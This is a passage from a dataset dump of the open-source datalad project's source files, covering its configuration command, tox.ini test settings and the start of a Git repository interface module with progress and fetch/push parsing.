conditions\n # - global and recursion makes no sense\n\n if action == 'dump':\n if scope:\n raise ValueError(\n 'Scope selection is not supported for dumping')\n\n # normalize variable specificatons\n specs = []\n for s in ensure_list(spec):\n if isinstance(s, tuple):\n specs.append((str(s[0]), str(s[1])))\n elif '=' not in s:\n specs.append((str(s),))\n else:\n specs.append(tuple(s.split('=', 1)))\n\n if action == 'set':\n missing_values = [s[0] for s in specs if len(s) < 2]\n if missing_values:\n raise ValueError(\n 'Values must be provided for all configuration '\n 'settings. Missing: {}'.format(missing_values))\n invalid_names = [s[0] for s in specs if '.' not in s[0]]\n if invalid_names:\n raise ValueError(\n 'Name must contain a section (i.e. \"section.name\"). '\n 'Invalid: {}'.format(invalid_names))\n\n ds = None\n if scope != 'global' or recursive:\n try:\n ds = require_dataset(\n dataset,\n check_installed=True,\n purpose='configure')\n except NoDatasetFound:\n if action != 'dump' or dataset:\n raise\n\n res_kwargs = dict(\n action='configuration',\n logger=lgr,\n )\n if ds:\n res_kwargs['refds'] = ds.path\n yield from configuration(action, scope, specs, res_kwargs, ds)\n\n if not recursive:\n return\n\n for subds in ds.subdatasets(\n state='present',\n recursive=True,\n recursion_limit=recursion_limit,\n on_failure='ignore',\n return_type='generator',\n result_renderer='disabled'):\n yield from configuration(\n action, scope, specs, res_kwargs, Dataset(subds['path']))\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n if (res['status'] != 'ok' or\n res['action'] not in ('get_configuration',\n 'dump_configuration')):\n if 'message' not in res and 'name' in res:\n suffix = '={}'.format(res['value']) if 'value' in res else ''\n res['message'] = '{}{}'.format(\n res['name'],\n suffix)\n default_result_renderer(res)\n return\n # TODO source\n from datalad.ui import ui\n name = res['name']\n if res['action'] == 'dump_configuration':\n for key in ('purpose', 'description'):\n s = res.get(key)\n if s:\n ui.message('\\n'.join(wrap(\n s,\n initial_indent='# ',\n subsequent_indent='# ',\n )))\n\n if kwargs.get('recursive', False):\n have_subds = res['path'] != res['refds']\n # we need to mark up from which dataset results are reported\n prefix = '<ds>{}{}:'.format(\n '/' if have_subds else '',\n Path(res['path']).relative_to(res['refds']).as_posix()\n if have_subds else '',\n )\n else:\n prefix = ''\n\n if kwargs.get('action', None) == 'dump':\n if 'value_type' in res:\n value_type = res['value_type']\n vtype = value_type.short_description() \\\n if hasattr(value_type, 'short_description') else str(value_type)\n vtype = f'Value constraint: {vtype}'\n ui.message('\\n'.join(wrap(\n vtype,\n initial_indent='# ',\n subsequent_indent='# ',\n break_on_hyphens=False,\n )))\n else:\n vtype = ''\n value = res['value'] if res['value'] is not None else ''\n if value in (True, False):\n # normalize booleans for git-config syntax\n value = str(value).lower()\n ui.message(f'{prefix}{ac.color_word(name, ac.BOLD)}={value}')\n else:\n ui.message('{}{}'.format(\n prefix,\n res['value'] if res['value'] is not None else '',\n ))\n\n\ndef configuration(action, scope, specs, res_kwargs, ds=None):\n if scope == 'global' or (action == 'dump' and ds is None):\n cfg = dlcfg\n else:\n cfg = ds.config\n\n if action not in config_actions:\n raise ValueError(\"Unsupported action '{}'\".format(action))\n\n if action == 'dump':\n if not specs:\n # dumping is querying for all known keys\n specs = [(n,) for n in sorted(set(cfg_defs.keys()).union(cfg.keys()))]\n scope = None\n\n for spec in specs:\n if '.' not in spec[0]:\n yield get_status_dict(\n ds=ds,\n status='error',\n message=(\n \"Configuration key without a section: '%s'\",\n spec[0],\n ),\n **res_kwargs)\n continue\n # TODO without get-all there is little sense in having add\n #if action == 'add':\n # res = _add(cfg, scope, spec)\n if action == 'get':\n res = _get(cfg, scope, spec[0])\n elif action == 'dump':\n res = _dump(cfg, spec[0])\n # TODO this should be there, if we want to be comprehensive\n # however, we turned this off by default in the config manager\n # because we hardly use it, and the handling in ConfigManager\n # is not really well done.\n #elif action == 'get-all':\n # res = _get_all(cfg, scope, spec)\n elif action == 'set':\n res = _set(cfg, scope, *spec)\n elif action == 'unset':\n res = _unset(cfg, scope, spec[0])\n\n if ds:\n res['path'] = ds.path\n\n if 'status' not in res:\n res['status'] = 'ok'\n\n yield dict(res_kwargs, **res)\n\n if action in ('add', 'set', 'unset'):\n # we perform a single reload, rather than one for each modification\n # TODO: can we detect a call from cmdline? We could skip the reload.\n cfg.reload(force=True)\n\n\ndef _dump(cfg, name):\n value = cfg.get(\n name,\n # pull a default from the config definitions\n # if we have no value, but a key\n cfg_defs.get(name, {}).get('default', None))\n\n res = dict(\n action='dump_configuration',\n name=name,\n value=value,\n )\n if name in cfg_defs:\n ui_def = cfg_defs[name].get('ui', [None, {}])[1]\n for s, key in (\n (ui_def.get('title'), 'purpose'),\n (ui_def.get('text'), 'description'),\n (cfg_defs[name].get('type'), 'value_type')):\n if s:\n res[key] = s\n return res\n\n\ndef _get(cfg, scope, name):\n value = cfg.get_from_source(scope, name) \\\n if scope else cfg.get(\n name,\n # pull a default from the config definitions\n # if we have no value, but a key (i.e. in dump mode)\n cfg_defs.get(name, {}).get('default', None))\n return dict(\n action='get_configuration',\n name=name,\n value=value,\n )\n\n\ndef _set(cfg, scope, name, value):\n cfg.set(name, value, scope=scope, force=True, reload=False)\n return dict(\n action='set_configuration',\n name=name,\n value=value,\n )\n\n\ndef _unset(cfg, scope, name):\n try:\n cfg.unset(name, scope=scope, reload=False)\n except CommandError as e:\n # we could also check if the option exists in the merged/effective\n # config first, but then we would have to make sure that there could\n # be no valid way of overriding a setting in a particular scope.\n # seems safer to do it this way\n if e.code == 5:\n return dict(\n status='error',\n action='unset_configuration',\n name=name,\n message=(\"configuration '%s' does not exist (%s)\", name, e),\n )\n return dict(\n action='unset_configuration',\n name=name,\n )\n" }, { "alpha_fraction": 0.6834757924079895, "alphanum_fraction": 0.7019942998886108, "avg_line_length": 27.30645179748535, "blob_id": "e3ee08fa86228e3d29a2f2cf851c5e6649fb407d", "content_id": "f409ebc4d81820550953605f34af558039106c0f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 3510, "license_type": "permissive", "max_line_length": 135, "num_lines": 124, "path": "/tox.ini", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = py3,lint,typing\n#,flake8\n\n[testenv:py3]\nchangedir = __testhome__\ncommands = pytest -c ../tox.ini -v {posargs} --pyargs datalad\nextras = full\n# tox 2. introduced isolation from invocation environment\n# HOME is used by annex standalone atm\n# https://git-annex.branchable.com/bugs/standalone_builds_shouldn__39__t_pollute___126____47__.ssh_with_helpers_merely_upon_annex_init/\n# so let's pass it, though in the future we should isolate\n# it back to guarantee that the tests do not rely on anything in\n# current user HOME\npassenv=HOME\nsetenv=\n DATALAD_LOG_LEVEL=DEBUG\n\n[testenv:lint]\nskip_install = true\ndeps =\n codespell~=2.0\n pylint~=2.15\ncommands =\n codespell\n # pylinting limited set of known obvious issues only\n pylint -d all -e W1202 datalad setup.py\n\n[testenv:flake8]\ncommands = flake8 {posargs}\n\n[testenv:typing]\nextras = tests\ndeps =\n distro # Remove when CI no longer uses Python 3.7 for type-checking.\n types-psutil\ncommands =\n # TODO: rich \"coverage\" sufficient to remove --follow-imports skip, and just specify datalad .\n # See https://github.com/datalad/datalad/issues/6884\n mypy --follow-imports skip {posargs} \\\n datalad/api.py \\\n datalad/cmd.py \\\n datalad/downloaders/providers.py \\\n datalad/interface/results.py \\\n datalad/runner \\\n datalad/support/annex_utils.py \\\n datalad/support/ansi_colors.py \\\n datalad/support/collections.py \\\n datalad/support/cookies.py \\\n datalad/support/digests.py \\\n datalad/support/gitrepo.py \\\n datalad/support/globbedpaths.py \\\n datalad/support/path.py \\\n datalad/support/strings.py \\\n datalad/typing.py \\\n datalad/utils.py\n\n[testenv:venv]\ncommands = {posargs}\n\n[testenv:docs]\nbasepython = python3\nextras =\n devel-docs\n full\nchangedir = docs\ncommands = sphinx-build -E -W -b html source build\n\n[pytest]\nfilterwarnings =\n error::DeprecationWarning:^datalad\n # TODO: https://github.com/datalad/datalad/issues/7435\n ignore:pkg_resources is deprecated:DeprecationWarning:\n error:.*yield tests:pytest.PytestCollectionWarning\n ignore:distutils Version classes are deprecated:DeprecationWarning\n # comes from boto\n ignore:the imp module is deprecated\n # workaround for https://github.com/datalad/datalad/issues/6307\n ignore:The distutils package is deprecated\nmarkers =\n fail_slow\n githubci_osx\n githubci_win\n integration\n known_failure\n known_failure_githubci_osx\n known_failure_githubci_win\n known_failure_osx\n known_failure_windows\n network\n osx\n probe_known_failure\n serve_path_via_http\n skip_if_adjusted_branch\n skip_if_no_network\n skip_if_on_windows\n skip_if_root\n skip_known_failure\n skip_nomultiplex_ssh\n skip_ssh\n skip_wo_symlink_capability\n slow\n turtle\n usecase\n windows\n with_config\n with_fake_cookies_db\n with_memory_keyring\n with_sameas_remotes\n with_testrepos\n without_http_proxy\n# Ensure that assertion helpers in utils_pytest.py get rewritten by pytest:\npython_files = test_*.py *_test.py utils_pytest.py\n\n[flake8]\n#show-source = True\n# E265 = comment blocks like @{ section, which it can't handle\n# E266 = too many leading '#' for block comment\n# E731 = do not assign a lambda expression, use a def\n# W293 = Blank line contains whitespace\n#ignore = E265,W293,E266,E731\nmax-line-length = 120\ninclude = datalad\nexclude = .tox,.venv,venv-debug,build,dist,doc,git/ext/\n" }, { "alpha_fraction": 0.5465742945671082, "alphanum_fraction": 0.5487117767333984, "avg_line_length": 38.763431549072266, "blob_id": "7e65670f7d0061bb15e1e77794cb3475d28126b5", "content_id": "0384ee63ed322ed8f016bfc8b48e6daf36f4a1a2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157662, "license_type": "permissive", "max_line_length": 267, "num_lines": 3965, "path": "/datalad/support/gitrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Internal low-level interface to Git repositories\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\nimport os\nimport os.path as op\nimport posixpath\nimport re\nimport subprocess\nimport warnings\nfrom collections.abc import (\n Callable,\n Iterable,\n Iterator,\n Mapping,\n Sequence,\n)\nfrom functools import wraps\nfrom itertools import chain\nfrom os import (\n PathLike,\n linesep,\n)\nfrom os.path import (\n commonprefix,\n curdir,\n dirname,\n exists,\n isabs,\n)\nfrom os.path import join as opj\nfrom os.path import (\n pardir,\n relpath,\n sep,\n)\nfrom re import Pattern\nfrom typing import (\n TYPE_CHECKING,\n Any,\n List,\n Optional,\n Tuple,\n TypeVar,\n Union,\n overload,\n)\n\nimport datalad.utils as ut\nfrom datalad import ssh_manager\nfrom datalad.cmd import (\n BatchedCommand,\n GitWitlessRunner,\n NoCapture,\n StdOutErrCapture,\n WitlessProtocol,\n)\nfrom datalad.config import (\n parse_gitconfig_dump,\n write_config_section,\n)\nfrom datalad.consts import (\n ILLEGAL_CHARS_WIN,\n RESERVED_NAMES_WIN,\n)\nfrom datalad.core.local.repo import repo_from_path\nfrom datalad.dataset.gitrepo import GitRepo as CoreGitRepo\nfrom datalad.dataset.gitrepo import (\n _get_dot_git,\n path_based_str_repr,\n)\nfrom datalad.log import log_progress\nfrom datalad.support.due import (\n Doi,\n due,\n)\nfrom datalad.typing import (\n Concatenate,\n Literal,\n P,\n Protocol,\n Self,\n T,\n TypedDict,\n)\nfrom datalad.utils import (\n Path,\n PurePosixPath,\n ensure_dir,\n ensure_list,\n ensure_unicode,\n generate_file_chunks,\n getpwd,\n is_interactive,\n on_windows,\n optional_args,\n path_is_subpath,\n posix_relpath,\n)\n\nfrom .exceptions import (\n CapturedException,\n CommandError,\n FileNotInRepositoryError,\n InvalidGitReferenceError,\n InvalidGitRepositoryError,\n NoSuchPathError,\n)\n# imports from same module:\nfrom .external_versions import external_versions\nfrom .network import (\n RI,\n PathRI,\n is_ssh,\n)\nfrom .path import (\n get_filtered_paths_,\n get_parent_paths,\n)\n\nif TYPE_CHECKING:\n from datalad.distribution.dataset import Dataset\n\n# shortcuts\n_curdirsep = curdir + sep\n_pardirsep = pardir + sep\n\n\nlgr = logging.getLogger('datalad.gitrepo')\n\nOption = Union[str, bool, None, List[Union[str, bool, None]], Tuple[Union[str, bool, None], ...]]\n\n\n# outside the repo base classes only used in ConfigManager\ndef to_options(split_single_char_options: bool = True, **kwargs: Option) -> list[str]:\n \"\"\"Transform keyword arguments into a list of cmdline options\n\n Imported from GitPython.\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n\n Parameters\n ----------\n split_single_char_options: bool\n\n kwargs:\n\n Returns\n -------\n list\n \"\"\"\n def dashify(string: str) -> str:\n return string.replace('_', '-')\n\n def transform_kwarg(name: str, value: str | bool | None, split_single_char_options: bool) -> list[str]:\n if len(name) == 1:\n if value is True:\n return [\"-%s\" % name]\n elif value not in (False, None):\n if split_single_char_options:\n return [\"-%s\" % name, \"%s\" % value]\n else:\n return [\"-%s%s\" % (name, value)]\n else:\n if value is True:\n return [\"--%s\" % dashify(name)]\n elif value is not False and value is not None:\n return [\"--%s=%s\" % (dashify(name), value)]\n return []\n\n args = []\n for k, v in sorted(kwargs.items()):\n if isinstance(v, (list, tuple)):\n for value in v:\n args += transform_kwarg(k, value, split_single_char_options)\n else:\n args += transform_kwarg(k, v, split_single_char_options)\n return args\n\n\ndef _normalize_path(base_dir: str, path: str) -> str:\n \"\"\"Helper to check paths passed to methods of this class.\n\n Checks whether `path` is beneath `base_dir` and normalizes it.\n Additionally paths are converted into relative paths with respect to\n `base_dir`, considering PWD in case of relative paths. This\n is intended to be used in repository classes, which means that\n `base_dir` usually will be the repository's base directory.\n\n Parameters\n ----------\n base_dir: str\n directory to serve as base to normalized, relative paths\n path: str\n path to be normalized\n\n Returns\n -------\n str:\n path, that is a relative path with respect to `base_dir`\n \"\"\"\n if not path:\n return path\n pathobj = Path(path)\n\n # do absolute() in addition to always get an absolute path\n # even with non-existing base_dirs on windows\n base_dir = str(Path(base_dir).resolve().absolute()) # realpath OK\n\n # path = normpath(path)\n # Note: disabled normpath, because it may break paths containing symlinks;\n # But we don't want to realpath relative paths, in case cwd isn't the\n # correct base.\n\n if pathobj.is_absolute():\n # path might already be a symlink pointing to annex etc,\n # so realpath only its directory, to get \"inline\" with\n # realpath(base_dir) above\n path = str(pathobj.parent.resolve() / pathobj.name) # realpath OK\n # Executive decision was made to not do this kind of magic!\n #\n # elif commonprefix([realpath(getpwd()), base_dir]) == base_dir:\n # # If we are inside repository, rebuilt relative paths.\n # path = opj(realpath(getpwd()), path)\n #\n # BUT with relative curdir/pardir start it would assume relative to curdir\n #\n elif path.startswith(_curdirsep) or path.startswith(_pardirsep):\n path = str(Path(getpwd()).resolve() / pathobj) # realpath OK\n else:\n # We were called from outside the repo. Therefore relative paths\n # are interpreted as being relative to self.path already.\n return path\n\n if commonprefix([path, base_dir]) != base_dir:\n raise FileNotInRepositoryError(msg=\"Path outside repository: %s\"\n % base_dir, filename=path)\n\n return relpath(path, start=base_dir)\n\n\nclass _WithPath(Protocol):\n path: str\n\n\n@optional_args\ndef normalize_path(func: Callable[Concatenate[_WithPath, str, P], T]) -> Callable[Concatenate[_WithPath, str, P], T]:\n \"\"\"Decorator to provide unified path conversion for a single file\n\n Unlike normalize_paths, intended to be used for functions dealing with a\n single filename at a time\n\n Note\n ----\n This is intended to be used within the repository classes and therefore\n returns a class method!\n\n The decorated function is expected to take a path at\n first positional argument (after 'self'). Additionally the class `func`\n is a member of, is expected to have an attribute 'path'.\n \"\"\"\n\n @wraps(func)\n def _wrap_normalize_path(self: _WithPath, file_: str, *args: P.args, **kwargs: P.kwargs) -> T:\n file_new = _normalize_path(self.path, file_)\n return func(self, file_new, *args, **kwargs)\n\n return _wrap_normalize_path\n\n\n@optional_args\ndef normalize_paths(func, match_return_type=True, map_filenames_back=False,\n serialize=False):\n \"\"\"Decorator to provide unified path conversions.\n\n Note\n ----\n This is intended to be used within the repository classes and therefore\n returns a class method!\n\n The decorated function is expected to take a path or a list of paths at\n first positional argument (after 'self'). Additionally the class `func`\n is a member of, is expected to have an attribute 'path'.\n\n Accepts either a list of paths or a single path in a str. Passes a list\n to decorated function either way, but would return based on the value of\n match_return_type and possibly input argument.\n\n If a call to the wrapped function includes normalize_path and it is False\n no normalization happens for that function call (used for calls to wrapped\n functions within wrapped functions, while possible CWD is within a\n repository)\n\n Parameters\n ----------\n match_return_type : bool, optional\n If True, and a single string was passed in, it would return the first\n element of the output (after verifying that it is a list of length 1).\n It makes easier to work with single files input.\n map_filenames_back : bool, optional\n If True and returned value is a dictionary, it assumes to carry entries\n one per file, and then filenames are mapped back to as provided from the\n normalized (from the root of the repo) paths\n serialize : bool, optional\n Loop through files giving only a single one to the function one at a time.\n This allows to simplify implementation and interface to annex commands\n which do not take multiple args in the same call (e.g. checkpresentkey)\n \"\"\"\n\n @wraps(func)\n def _wrap_normalize_paths(self, files, *args, **kwargs):\n\n normalize = _normalize_path if kwargs.pop('normalize_paths', True) \\\n else lambda rpath, filepath: filepath\n\n if files:\n if isinstance(files, str) or not files:\n files_new = [normalize(self.path, files)]\n single_file = True\n elif isinstance(files, list):\n files_new = [normalize(self.path, path) for path in files]\n single_file = False\n else:\n raise ValueError(\"_files_decorator: Don't know how to handle \"\n \"instance of %s.\" % type(files))\n else:\n single_file = None\n files_new = []\n\n if map_filenames_back:\n def remap_filenames(out):\n \"\"\"Helper to map files back to non-normalized paths\"\"\"\n if isinstance(out, dict):\n assert(len(out) == len(files_new))\n files_ = [files] if single_file else files\n mapped = out.__class__()\n for fin, fout in zip(files_, files_new):\n mapped[fin] = out[fout]\n return mapped\n else:\n return out\n else:\n remap_filenames = lambda x: x\n\n if serialize: # and not single_file:\n result = [\n func(self, f, *args, **kwargs)\n for f in files_new\n ]\n else:\n result = func(self, files_new, *args, **kwargs)\n\n if single_file is None:\n # no files were provided, nothing we can do really\n return result\n elif (result is None) or not match_return_type or not single_file:\n # If function doesn't return anything or no denormalization\n # was requested or it was not a single file\n return remap_filenames(result)\n elif single_file:\n if len(result) != 1:\n # Magic doesn't apply\n return remap_filenames(result)\n elif isinstance(result, (list, tuple)):\n return result[0]\n elif isinstance(result, dict) and tuple(result)[0] == files_new[0]:\n # assume that returned dictionary has files as keys.\n return tuple(result.values())[0]\n else:\n # no magic can apply\n return remap_filenames(result)\n else:\n return RuntimeError(\"should have not got here... check logic\")\n\n return _wrap_normalize_paths\n\n\nif \"2.24.0\" <= external_versions[\"cmd:git\"] < \"2.25.0\":\n # An unintentional change in Git 2.24.0 led to `ls-files -o` traversing\n # into untracked submodules when multiple pathspecs are given, returning\n # repositories that are deeper than the first level. This helper filters\n # these deeper levels out so that save_() doesn't fail trying to add them.\n #\n # This regression fixed with upstream's 072a231016 (2019-12-10).\n def _prune_deeper_repos(repos: list[Path]) -> list[Path]:\n firstlevel_repos = []\n prev = None\n for repo in sorted(repos):\n if not (prev and str(repo).startswith(prev)):\n prev = str(repo)\n firstlevel_repos.append(repo)\n return firstlevel_repos\nelse:\n def _prune_deeper_repos(repos: list[Path]) -> list[Path]:\n return repos\n\n\nclass GitProgress(WitlessProtocol):\n \"\"\"Reduced variant of GitPython's RemoteProgress class\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n \"\"\"\n # inform super-class to capture stderr\n proc_err = True\n\n _num_op_codes = 10\n BEGIN, END, COUNTING, COMPRESSING, WRITING, RECEIVING, RESOLVING, FINDING_SOURCES, CHECKING_OUT, ENUMERATING = \\\n [1 << x for x in range(_num_op_codes)]\n STAGE_MASK = BEGIN | END\n OP_MASK = ~STAGE_MASK\n\n DONE_TOKEN = 'done.'\n TOKEN_SEPARATOR = ', '\n\n _known_ops = {\n COUNTING: (\"Counting\", \"Objects\"),\n ENUMERATING: (\"Enumerating\", \"Objects\"),\n COMPRESSING: (\"Compressing\", \"Objects\"),\n WRITING: (\"Writing\", \"Objects\"),\n RECEIVING: (\"Receiving\", \"Objects\"),\n RESOLVING: (\"Resolving\", \"Deltas\"),\n FINDING_SOURCES: (\"Finding\", \"Sources\"),\n CHECKING_OUT: (\"Check out\", \"Things\"),\n }\n\n __slots__ = ('_unprocessed', '_seen_ops', '_pbars')\n\n re_op_absolute = re.compile(r\"(remote: )?([\\w\\s]+):\\s+()(\\d+)()(.*)\")\n re_op_relative = re.compile(r\"(remote: )?([\\w\\s]+):\\s+(\\d+)% \\((\\d+)/(\\d+)\\)(.*)\")\n\n def __init__(self, done_future: Any = None, encoding: Optional[str] = None) -> None:\n super().__init__(done_future=done_future, encoding=encoding)\n self._unprocessed: Optional[bytes] = None\n self._seen_ops: list[int] = []\n self._pbars: set[str] = set()\n\n def connection_made(self, transport: subprocess.Popen) -> None:\n super().connection_made(transport)\n self._seen_ops = []\n self._pbars = set()\n\n def process_exited(self) -> None:\n # take down any progress bars that were not closed orderly\n for pbar_id in self._pbars:\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished',\n )\n super().process_exited()\n\n def pipe_data_received(self, fd: int, byts: bytes) -> None:\n # progress reports only come from stderr\n if fd != 2:\n # let the base class decide what to do with it\n super().pipe_data_received(fd, byts)\n return\n for line in byts.splitlines(keepends=True):\n # put any unprocessed content back in front\n line = self._unprocessed + line if self._unprocessed else line\n self._unprocessed = None\n if not self._parse_progress_line(line):\n # anything that doesn't look like a progress report\n # is retained and returned\n # in case of partial progress lines, this can lead to\n # leakage of progress info into the output, but\n # it is better to enable better (maybe more expensive)\n # subsequent filtering than hiding lines with\n # unknown, potentially important info\n lgr.debug('Non-progress stderr: %s', line)\n if line.endswith((b'\\r', b'\\n')):\n # complete non-progress line, pass on\n super().pipe_data_received(fd, line)\n else:\n # an incomplete line, maybe the next batch completes\n # it to become a recognizable progress report\n self._unprocessed = line\n\n def _parse_progress_line(self, bytes_line: bytes) -> bool:\n \"\"\"Process a single line\n\n Parameters\n ----------\n bytes_line : bytes\n\n Returns\n -------\n bool\n Flag whether the line was recognized as a Git progress report.\n \"\"\"\n # handle\n # Counting objects: 4, done.\n # Compressing objects: 50% (1/2)\n # Compressing objects: 100% (2/2)\n # Compressing objects: 100% (2/2), done.\n line = bytes_line.decode(self.encoding)\n if line.startswith(('warning:', 'error:', 'fatal:')):\n return False\n\n # find escape characters and cut them away - regex will not work with\n # them as they are non-ascii. As git might expect a tty, it will send them\n last_valid_index = None\n for i, c in enumerate(reversed(line)):\n if ord(c) < 32:\n # its a slice index\n last_valid_index = -i - 1\n # END character was non-ascii\n # END for each character in line\n if last_valid_index is not None:\n line = line[:last_valid_index]\n # END cut away invalid part\n line = line.rstrip()\n\n cur_count, max_count = None, None\n match = self.re_op_relative.match(line)\n if match is None:\n match = self.re_op_absolute.match(line)\n\n if not match:\n return False\n # END could not get match\n\n op_code = 0\n _remote, op_name, _percent, cur_count, max_count, message = match.groups()\n\n # get operation id\n if op_name == \"Counting objects\":\n op_code |= self.COUNTING\n elif op_name == \"Compressing objects\":\n op_code |= self.COMPRESSING\n elif op_name == \"Writing objects\":\n op_code |= self.WRITING\n elif op_name == 'Receiving objects':\n op_code |= self.RECEIVING\n elif op_name == 'Resolving deltas':\n op_code |= self.RESOLVING\n elif op_name == 'Finding sources':\n op_code |= self.FINDING_SOURCES\n elif op_name == 'Checking out files':\n op_code |= self.CHECKING_OUT\n elif op_name == 'Enumerating objects':\n op_code |= self.ENUMERATING\n else:\n # Note: On windows it can happen that partial lines are sent\n # Hence we get something like \"CompreReceiving objects\", which is\n # a blend of \"Compressing objects\" and \"Receiving objects\".\n # This can't really be prevented.\n lgr.debug(\n 'Output line matched a progress report of an unknown type: %s',\n line)\n # TODO investigate if there is any chance that we might swallow\n # important info -- until them do not flag this line\n # as progress\n return False\n # END handle op code\n\n pbar_id = 'gitprogress-{}-{}'.format(id(self), op_code)\n\n op_props = self._known_ops[op_code]\n\n # figure out stage\n if op_code not in self._seen_ops:\n self._seen_ops.append(op_code)\n op_code |= self.BEGIN\n log_progress(\n lgr.info,\n pbar_id,\n 'Start {} {}'.format(\n op_props[0].lower(),\n op_props[1].lower(),\n ),\n label=op_props[0],\n unit=' {}'.format(op_props[1]),\n total=float(max_count) if max_count else None,\n )\n self._pbars.add(pbar_id)\n # END begin opcode\n\n if message is None:\n message = ''\n # END message handling\n\n done_progress = False\n message = message.strip()\n if message.endswith(self.DONE_TOKEN):\n op_code |= self.END\n message = message[:-len(self.DONE_TOKEN)]\n done_progress = True\n # END end message handling\n message = message.strip(self.TOKEN_SEPARATOR)\n\n if cur_count and max_count:\n log_progress(\n lgr.info,\n pbar_id,\n line,\n update=float(cur_count),\n noninteractive_level=logging.DEBUG,\n )\n\n if done_progress:\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished {} {}'.format(\n op_props[0].lower(),\n op_props[1].lower(),\n ),\n noninteractive_level=logging.DEBUG,\n )\n self._pbars.discard(pbar_id)\n return True\n\n\nclass StdOutCaptureWithGitProgress(GitProgress):\n proc_out = True\n\n\nclass FetchInfo(dict):\n \"\"\"\n dict that carries results of a fetch operation of a single head\n\n Reduced variant of GitPython's RemoteProgress class\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n \"\"\"\n\n NEW_TAG, NEW_HEAD, HEAD_UPTODATE, TAG_UPDATE, REJECTED, FORCED_UPDATE, \\\n FAST_FORWARD, ERROR = [1 << x for x in range(8)]\n\n _re_fetch_result = re.compile(r'^\\s*(.) (\\[?[\\w\\s\\.$@]+\\]?)\\s+(.+) [-> ]+ ([^\\s]+)( \\(.*\\)?$)?')\n\n _flag_map = {\n '!': ERROR,\n '+': FORCED_UPDATE,\n '*': 0,\n '=': HEAD_UPTODATE,\n ' ': FAST_FORWARD,\n '-': TAG_UPDATE,\n }\n _operation_map = {\n NEW_TAG: 'new-tag',\n NEW_HEAD: 'new-branch',\n HEAD_UPTODATE: 'uptodate',\n TAG_UPDATE: 'tag-update',\n REJECTED: 'rejected',\n FORCED_UPDATE: 'forced-update',\n FAST_FORWARD: 'fast-forward',\n ERROR: 'error',\n }\n\n @classmethod\n def _from_line(cls, line: str) -> FetchInfo:\n \"\"\"Parse information from the given line as returned by git-fetch -v\n and return a new FetchInfo object representing this information.\n \"\"\"\n match = cls._re_fetch_result.match(line)\n if match is None:\n raise ValueError(\"Failed to parse line: %r\" % line)\n\n # parse lines\n control_character, operation, local_remote_ref, remote_local_ref, note = \\\n match.groups()\n\n # parse flags from control_character\n flags = 0\n try:\n flags |= cls._flag_map[control_character]\n except KeyError:\n raise ValueError(\n \"Control character %r unknown as parsed from line %r\"\n % (control_character, line))\n # END control char exception handling\n\n # parse operation string for more info - makes no sense for symbolic refs,\n # but we parse it anyway\n old_commit = None\n if 'rejected' in operation:\n flags |= cls.REJECTED\n if 'new tag' in operation:\n flags |= cls.NEW_TAG\n if 'tag update' in operation:\n flags |= cls.TAG_UPDATE\n if 'new branch' in operation:\n flags |= cls.NEW_HEAD\n if '...' in operation or '..' in operation:\n split_token = '...'\n if control_character == ' ':\n split_token = split_token[:-1]\n old_commit = operation.split(split_token)[0]\n # END handle refspec\n\n return cls(\n ref=remote_local_ref.strip(),\n local_ref=local_remote_ref.strip(),\n # convert flag int into a list of operation labels\n operations=[\n cls._operation_map[o]\n for o in cls._operation_map.keys()\n if flags & o\n ],\n note=note,\n old_commit=old_commit,\n )\n\n\nclass PushInfo(dict):\n \"\"\"dict that carries results of a push operation of a single head\n\n Reduced variant of GitPython's RemoteProgress class\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n \"\"\"\n NEW_TAG, NEW_HEAD, NO_MATCH, REJECTED, REMOTE_REJECTED, REMOTE_FAILURE, DELETED, \\\n FORCED_UPDATE, FAST_FORWARD, UP_TO_DATE, ERROR = [1 << x for x in range(11)]\n\n _flag_map = {'X': NO_MATCH,\n '-': DELETED,\n '*': 0,\n '+': FORCED_UPDATE,\n ' ': FAST_FORWARD,\n '=': UP_TO_DATE,\n '!': ERROR}\n\n _operation_map = {\n NEW_TAG: 'new-tag',\n NEW_HEAD: 'new-branch',\n NO_MATCH: 'no-match',\n REJECTED: 'rejected',\n REMOTE_REJECTED: 'remote-rejected',\n REMOTE_FAILURE: 'remote-failure',\n DELETED: 'deleted',\n FORCED_UPDATE: 'forced-update',\n FAST_FORWARD: 'fast-forward',\n UP_TO_DATE: 'uptodate',\n ERROR: 'error',\n }\n\n @classmethod\n def _from_line(cls, line: str) -> PushInfo:\n \"\"\"Create a new PushInfo instance as parsed from line which is expected to be like\n refs/heads/master:refs/heads/master 05d2687..1d0568e as bytes\"\"\"\n control_character, from_to, summary = line.split('\\t', 3)\n flags = 0\n\n # control character handling\n try:\n flags |= cls._flag_map[control_character]\n except KeyError:\n raise ValueError(\"Control character %r unknown as parsed from line %r\" % (control_character, line))\n # END handle control character\n\n # from_to handling\n from_ref_string, to_ref_string = from_to.split(':')\n\n # commit handling, could be message or commit info\n old_commit = None\n if summary.startswith('['):\n if \"[rejected]\" in summary:\n flags |= cls.REJECTED\n elif \"[remote rejected]\" in summary:\n flags |= cls.REMOTE_REJECTED\n elif \"[remote failure]\" in summary:\n flags |= cls.REMOTE_FAILURE\n elif \"[no match]\" in 